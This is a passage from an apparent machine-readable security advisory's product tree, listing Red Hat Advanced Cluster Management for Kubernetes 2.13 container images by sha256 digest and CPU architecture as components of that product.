"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
